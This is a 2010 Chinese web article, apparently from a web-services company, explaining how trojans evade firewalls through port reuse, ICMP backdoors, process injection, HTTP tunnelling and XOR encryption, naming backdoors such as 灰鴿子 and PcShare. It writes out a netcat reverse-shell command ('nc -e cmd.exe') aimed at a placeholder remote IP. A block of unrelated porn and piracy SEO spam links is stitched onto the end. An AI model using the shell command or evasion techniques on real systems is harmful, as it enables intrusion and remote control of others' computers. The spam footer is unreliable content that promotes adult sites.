木馬怎樣穿過防火墻進入你的電腦
2010/6/21 16:13:48
網站建設資深技術為您分析:您電腦中的木馬是如何穿過防火墻的:
1. 首先就是No Firewall(允許本地對外監聽基本上任何端口),沒有防火墻?對付這種機器好辦,隨便哪個馬一般都行典型代表 Radmin,rdp 3389/tcp
2. 端口篩選:
使用工具netcat就可以穿刺這種防火墻:nc -e cmd.exe 遠程ip,遠程監聽port;隨后,端口復用技術也出現了,復用防火墻開放的端口:如80,21,445等...典型的后門如hkdoor,ntrookit;還有利用無端口協議來通信,如利用icmp報文,典型的如pingdoor,Ping由于使用icmp報文,根本不開放端口,端口篩選也就無可奈何了,但是icmp并無差錯控制,所以這種后門的傳輸特性也并不理想,除非自己加上差錯控制;更牛的,就是干脆拋開TCP/IP協議,木馬自定義協議進行通信,你防火墻能把我怎么樣?典型的如ntrootkit采用了自定義協議技術.
3.應用程序篩選.
進程插入技術誕生了,通常firewall都要允許iexplore.exe,explore.exe,svchost.exe,services.exe等程序訪問網絡,于是木馬便盯上了這些程序.插入...插入再插入。現在的遠程控制一般都是插入進程式,一是隱蔽(沒有自己進程),二是穿墻.典型如Bits.dll(替換系統服務BITS,插入svchost.exe中)和灰鴿子/PcShare(默認插入iexplorer.exe瀏覽器進程)等.
4.協議篩選.
挖隧道: http-tunnel (http隧道)將木馬通信封裝成http數據報進行傳輸.使用這種技術的有pcshare(使用雙向http隧道傳輸)
5.IP過濾,一般就是化分為本機,局域網,廣域網三個層次,不過木馬也不是吃素的,有些木馬已經開始智能化了:
比如,無法連到黑客主機或者跳板,就搜索本機的代理設置,如IE代理設置,然后代理出去!可以想象P2P形式的馬也將于不久以后成為可能,這樣木馬和僵尸網絡的區別就更小了 呵呵
6. 現在很多防火墻都可以檢測傳輸的敏感信息,如用戶口令等,所以抗IDS,抗自動分析,這便成了高級木馬需要考慮的東西,換句話說保護黑客控制的安全性和隱秘性.典型的解決方法就是采取加密措施,如最簡單的對付IDS檢測的方法,xor異或加密.
但是現在的防護墻肯定不是以上技術的分離,而是一定有多項技術同時采用.
返回列表
返回首頁
主站蜘蛛池模板:
一级视频免费观看|
内裤奇缘电子书|
永久在线观看www免费视频|
好吊妞视频免费观看va|
久久久久高潮毛片免费全部播放|
欧美日韩一区二区综合|
依依成人精品视频在线观看|
羞羞视频网站免费入口|
国产在线无码精品无码|
网站在线观看你懂的|
在线日韩麻豆一区|
一本大道香蕉高清视频app|
日批视频app|
久久精品无码精品免费专区
|
爱情岛讨论坛线路亚洲高品质|
啦啦啦手机完整免费高清观看|
国产精品美女网站在线看|
亚洲亚洲人成综合网络|
污污网站免费在线观看|
免费国产在线观看|
老司机免费午夜精品视频|
国产午夜福利久久精品|
免费观看无遮挡www的小视频|
国产精品视频二区不卡|
99久久国产综合精品swag|
太大了轻点丝袜阿受不了|
一级毛片视频在线观看|
日日夜夜操视频|
久久亚洲sm情趣捆绑调教|
日韩欧美色综合|
五月天婷婷综合网|
欧美日韩一区二区三区在线观看视频
|
国产精品lululu在线观看|
91欧美在线视频|
日韩亚洲欧洲在线rrrr片|
亚洲人成在线播放网站|
欧美另类69xxxxxhd|
亚洲日韩一页精品发布|
欧美黑人xxxx性高清版|
亚洲系列第一页|
波多野结衣视频全集|